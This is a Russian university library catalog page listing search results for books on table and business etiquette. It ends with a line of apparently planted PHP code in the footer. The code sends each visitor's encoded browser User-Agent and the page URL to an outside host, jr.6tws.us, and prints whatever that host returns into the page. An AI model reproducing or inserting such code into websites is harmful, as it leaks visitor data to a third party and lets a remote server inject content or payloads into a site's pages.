Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

121 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЭТИКЕТ СТОЛОВЫЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Энциклопедия изысканного стиля [Текст] : 400 лет этикета за столом / пер. с англ, 2009. - 141 с.
Держатели документа (Информация об экземплярах) 
2. 
Инч А. <1 000=тысяча> правил сервировки и столового этикета [Текст] : безупречные рекомендации лучшего английского дворецкого / А. Инч, А. Херст, 2009. - 159 с.
Держатели документа (Информация об экземплярах) 
3. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. пособие для образоват. учреждений нач. проф. образования / В. В. Усов, 2007. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
4. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. для образоват. учреждений нач. проф. образования / В. В. Усов, 2006. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
5. 
Квитшау А. 100 важнейших правил бизнес-этикета [Текст] : переводное издание / А. Квитшау, Х. Таберниг, 2012. - 247 с.
Держатели документа (Информация об экземплярах) 
6. 
Этикет и сервировка стола [Текст] : издания для досуга, 1996. - 463 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
7. 
Фесенко О. П. Этика деловых отношений [Электронный ресурс] / О. П. Фесенко, С. В. Колесникова, М. В. Колесник, 2013 o=эл. опт. диск
Держатели документа (Информация об экземплярах) 
8. 
Фесенко О. П. Этика деловых отношений [Электронный ресурс] / О. П. Фесенко, С. В. Колесникова, М. В. Колесник, 2013 o=эл. опт. диск
Держатели документа (Информация об экземплярах) 
9. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] / В. В. Усов, 2011. - 432 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- БАНКЕТ КОМБИНИРОВАННЫЙ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- КЕЙТЕРИНГ
Держатели документа (Информация об экземплярах) 
10. 
Сборник статей преподавателей колледжа предпринимательства и права, г. Омск [Текст] : сб. науч. трудов / Колледж предпринимательства и права, 2004. - 244 с.
Оглавление 
  • Авадэни, Ю. И. Предпринимательский стиль управления - путь к формированию конкурентных преимуществ предприятия / Ю. И. Авадэни. - с.3-7
  • Определение роли терминов в научном познании и в подготовке специалистов. - с.7-11
  • Анацкая, А. Г. Информационные технологии в обучении / А. Г. Анацкая. - с.12-16
    Кл. слова: ОБРАЗОВАНИЕ - ИНФОРМАТИЗАЦИЯ
  • Анисова, Л. В. Рынок и конкуренция - главный механизм развития современной экономики / Л. В. Анисова. - с.17-21
  • Баева, Р. Ф. Некоторые проблемы правового образования в Российской Федерации / Р. Ф. Баева. - с.22-25
    Кл. слова: образование правовое
  • Бармотина, Ю. В. Налогообложение расходов вместо налогообложения прибыли / Ю. В. Бармотина. - с.26-31
  • Бондаревская, И. Н. Вредные факторы бытовой среды. Влияние строительных и отделочных материалов на здоровье человека / И. Н. Бондаревская. - с.32-40
    Кл. слова: СРЕДА БЫТОВАЯ - экология, ЖИЛИЩЕ - экология
  • Быкова, И. В. Применение пищевых добавок в пищевой промышленности / И. В. Быкова. - с.41-46
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Васильева, Т. Н. Проведение экспертизы некачественных и опасных продовольственного сырья и пищевых продуктов, их использование или уничтожение / Т. Н. Васильева. - с.47-52
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ, ЭКСПЕРТИЗА ПИЩЕВЫХ ПРОДУКТОВ
  • Вебер, Т. Г. Новые виды диетических и хлебобулочных изделий и их роль в питании человека / Т. Г. Вебер. - с.53-55
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ, ХЛЕБ - питание
  • Веселова, Т. И. Ритуал застолья / Т. И. Веселова. - с.56-64
    Кл. слова: ЭТИКЕТ СТОЛОВЫЙ
  • Винокурова, О. Н. Проблемы развития экономической инфраструктуры региона в современных условиях / О. Н. Винокурова. - с.65-73
    Кл. слова: ЗАНЯТОСТЬ ВТОРИЧНАЯ, самозанятость
  • Гаврикова, Г. Т. Нравственные категории в мировоззренческой платформе профессиональной деятельности специалиста-правоведа / Г. Т. Гаврикова. - с.74-78
    Кл. слова: КУЛЬТУРА НРАВСТВЕННАЯ
  • Гайнуллина, Г. А. Роль качества в деле повышения конкурентоспособности продукции / Г. А. Гайнуллина. - с.79-82
    Кл. слова: КАЧЕСТВО ПРОДУКЦИИ, КОНКУРЕНТОСПОСОБНОСТЬ ПРОДУК
  • Гатаулина, Н. И. Работа над словарем профессиональной лексики студентов колледжа / Н. И. Гатаулина, Л. А. Лоскутова. - с.83-88
  • Голубь, Н. Н. Использование нетрадиционных продуктов в питании населения / Н. Н. Голубь. - с.89-93
    Кл. слова: ОРЕХИ - ПИТАНИЕ, семечки - питание, ТОПИНАМБУР - питание
  • Гришина, Е. С. Разработка и исследование десертного продукта функционального назначения / Е. С. Гришина. - с.94-105
  • Калинина, Ю. И. Лесопользование Омской области / Ю. И. Калинина. - с.106-111
  • Кислицына, Т. Ф. Некоторые критерии оценки конкурентоспособности СТО / Т. Ф. Кислицына. - с.112-124
    Кл. слова: ОБСЛУЖИВАНИЕ ТОРГОВОЕ
  • Кобзарь, О. В. Разделение властей как признак правового государства / О. В. Кобзарь. - с.125-129
    Кл. слова: РАЗДЕЛЕНИЕ ВЛАСТЕЙ
  • Колесникова, О. В. Информационные технологии в профессиональной деятельности юриста / О. В. Колесникова. - с.130-132
  • Комарова, В. И. Влияние золоотвалов на подземные и поверхностные воды регионов ГЭС и мероприятия по их охране / В. И. Комарова. - с.133-139
    Кл. слова: ОХРАНА ВОД
  • Крахмалева, Н. А. Современные компьютерные технологии в преподавании математических дисциплин / Н. А. Крахмалева. - с.140-144
  • Куликова, М. Е. Информационные технологии в бухгалтерском учете / М. Е. Куликова. - с.145-149
    Кл. слова: УЧЕТ - АВТОМАТИЗАЦИЯ
  • Курнышова, Н. А. Мерчандайзинг как один из инструментов формирования ассортимента / Н. А. Курнышова ; 150-153
  • Мавруева, Е. Д. Информационные технологии в педагогической деятельности / Е. Д. Мавруева. - с.154-162
  • Маркина, Н. А. Конституционные принципы регулирования трудовых правоотношений / Н. А. Маркина. - с.157-162
  • Муранова, Т. В. Правомерное поведение / Т. В. Муранова. - с.163-168
    Кл. слова: СОЗНАНИЕ ПРАВОВОЕ, ПОВЕДЕНИЕ ПРАВОМЕРНОЕ
  • Норышева, Р. А. Влияние вредных веществ на качество продуктов питания / Р. А. Норышева. - с.169-173
  • Пономарева, О. П. Взаимосвязь финансового и управленческого учета: назначение, принципы организации / О. П. Пономарева. - с.174-183
    Кл. слова: УЧЕТ УПРАВЛЕНЧЕСКИЙ, УЧЕТ ФИНАНСОВЫЙ
  • Сакова, М. Г. Биологическая роль некоторых химических элементов в организме человека / М. Г. Сакова. - с.184-196
    Кл. слова: БИОХИМИЯ человека
  • Самолова, Т. И. Торговая мебель и аксессуары / Т. И. Самолова. - с.197-199
  • Самохина, Н. А. Регулирование финансовых рынков в системе актуальных реформ в сфере государственного управления / Н. А. Самохина. - с.200-205
    Кл. слова: РЫНОК ФИНАНСОВЫЙ - РОССИЯ
  • Судакова, С. Б. Порядок исчисления и уплаты единого социального налога в федеральный бюджет и страховых взносов в Пенсионный фонд России / С. Б. Судакова. - с.206-209
    Кл. слова: РЕФОРМА ПЕНСИОННАЯ - РОССИЯ
  • Ткаченко, О. Л. Рекламные тексты в средствах массовой информации / О. Л. Ткаченко. - с.210-214
    Кл. слова: ТЕКСТ РЕКЛАМНЫЙ
  • Фигурова, С. С. Законность и правопорядок в предпринимательских отношениях. Содержание законности / С. С. Фигурова. - с.215-223
  • Чикишева, Т. В. Проблема бухгалтерского и налогового учета по операциям с векселями. Преимущества расчета векселями / Т. В. Чикишева. - с.224-229
  • Шитова, З. А. Исследование рынка кожаной обуви / З. А. Шитова. - с.230-232
    Кл. слова: рынок обуви
  • Шляпина, Ю. В. Информатизация общества и информационная культура / Ю. В. Шляпина. - с.233-235
    Кл. слова: КУЛЬТУРА ИНФОРМАЦИОННАЯ
  • Юферева, Т. С. Проблема внедрения налогового учета в организации / Т. С. Юферева. - с.236-242
    Кл. слова: УЧЕТ НАЛОГОВЫЙ
Держатели документа (Информация об экземплярах) 
11. 
Правила вежливости и светского этикета [Текст], 2005. - 271 с.
Держатели документа (Информация об экземплярах) 
12. 
Шеламова Г. М. Деловая культура и психология общения [Текст] : Учеб. для учрежд. нач. проф. образования / Г. М. Шеламова, 2002. - 127,[1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
13. 
Шеламова Г. М. Деловая культура и психология общения [Текст] : Учеб. для учрежд. нач. проф. образования / Г. М. Шеламова, 2002. - 128 с.
Держатели документа (Информация об экземплярах) 
14. 
Большая энциклопедия дома и семьи. В 2 т. Т.1. Семья. Жилище. Ребенок. Питание. Здоровье, спорт, отдых. Одежда, обувь, индивидуальный стиль [Текст] : энциклопедия, 2000. - 479 с.
15. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : Учеб. / В. В. Усов, 2002. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
16. 
17. 
Соловьев Э. Я. Современный этикет. Деловой и международный протокол [Текст] : [Учеб. пособие] / Э. Я. Соловьев, 2003. - 319 с.
Ключевые слова 
ПРОТОКОЛ ДЕЛОВОЙ -- ПРОТОКОЛ МЕЖДУНАРОДНЫЙ -- ЭТИКЕТ СТОЛОВЫЙ -- ЭТИКЕТ ОБЩЕСТВЕННЫЙ -- ЭТИКЕТ ВНЕШНЕГО ОБЛИКА -- ЭТИКЕТ ТЕЛЕФОННОГО РАЗГОВОРА -- ПОДАРОК - ЭТИКЕТ -- РЕЗЮМЕ -- СОБЕСЕДОВАНИЕ - этикет -- ПРИЕМ НА РАБОТУ - этикет -- ЭТИКЕТ ДЕЛОВОЙ -- ЭТИКЕТ ДЕЛОВОЙ МЕЖДУНАРОДНЫЙ -- ПЕРЕГОВОРЫ ДЕЛОВЫЕ - ЭТИКЕТ -- ЭТИКЕТ - США -- ЭТИКЕТ - АНГЛИЯ -- ЭТИКЕТ - КИТАЙ -- ЭТИКЕТ - КОРЕЯ -- ЭТИКЕТ - ГЕРМАНИЯ -- ЭТИКЕТ - ФРАНЦИЯ -- ЭТИКЕТ - ЯПОНИЯ -- ТАЙНА КОММЕРЧЕСКАЯ -- ЗАЩИТА ИНФОРМАЦИИ деловой -- Защита интеллектуальной собственности -- ИМИДЖ ДЕЛОВОЙ ЖЕНЩИНЫ -- ИНФОРМАЦИЯ КОНФИДЕНЦИАЛЬНАЯ -- ПИСЬМО ДЕЛОВОЕ - этикет -- Телекс - этикет -- ТЕЛЕФАКС - этикет -- ПОЧТА ЭЛЕКТРОННАЯ - этикет -- ИМИДЖ ДЕЛОВОГО ЧЕЛОВЕКА -- ИМИДЖ ДЕЛОВОГО МУЖЧИНЫ -- ПРЕЗЕНТАЦИЯ - этикет -- ЭТИКЕТ ДИПЛОМАТИЧЕСКИЙ -- СУВЕРЕНИТЕТ ГОСУДАРСТВЕННЫЙ -- ВИЗИТ государственный -- НАПИТКИ - словарь терминов -- КОКТЕЙЛЬ -- КОРРЕСПОНДЕНЦИЯ дипломатическая -- КАРТОЧКА ВИЗИТНАЯ - этикет -- ПРАЗДНИКИ зарубежные -- ПОСОЛЬСТВО - Адреса -- КОНСУЛЬСТВО - Адреса
Оглавление 
  • Венская конвенция о дипломатических сношениях. - с.234-253
Держатели документа (Информация об экземплярах) 
18. 
Кузнецов И. Н. Современный этикет [Текст] / И. Н. Кузнецов, 2004. - 495 с.
Ключевые слова 
ЭТИКЕТ ДЕЛОВОЙ -- Этикет деловой международный -- ЭТИКЕТ ОБЩЕСТВЕННЫЙ -- ПОДАРОК - ЭТИКЕТ -- ПЕРЕПИСКА ДЕЛОВАЯ - ЭТИКЕТ -- ПРЕЗЕНТАЦИЯ - этикет -- ВСТРЕЧА ДЕЛОВАЯ - этикет -- СОВЕЩАНИЕ ДЕЛОВОЕ - этикет -- СОБРАНИЕ - этикет -- ПЕРЕГОВОРЫ ДЕЛОВЫЕ - этикет -- ПРИЕМ - Этикет -- ЭТИКЕТ столовый -- ЭТИКЕТ национальный -- Этикет - США -- Этикет - Англия -- Этикет - Германия -- Этикет - Япония -- Этикет - Австралия -- Этикет - Ирландия -- Этикет - Италия -- Этикет - Китай -- Этикет - Перу -- Этикет - Корея -- Этикет - Турция -- Этикет - Финляндия -- Этикет - Франция -- ЭТИКЕТ дипломатический -- ПРИЕМ ДИПЛОМАТИЧЕСКИЙ -- ЭТИКЕТ ВНЕШНЕГО ОБЛИКА -- КАРТОЧКА ВИЗИТНАЯ -- Делегация иностранная
Держатели документа (Информация об экземплярах) 
19. 
Архангельская М. Д. Бизнес-этикет, или Игра по правилам [Текст] : Правила, принципы, рекомендации / М. Д. Архангельская, 2002. - 159 с.
Держатели документа (Информация об экземплярах) 
20. 
Курочкина И. Н. Этикет для детей и взрослых [Текст] : Учеб. пособие для студ. пед. вузов / И. Н. Курочкина, 2001. - 253 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3053 - 19.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.72 с.12 запросов, 0.40c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;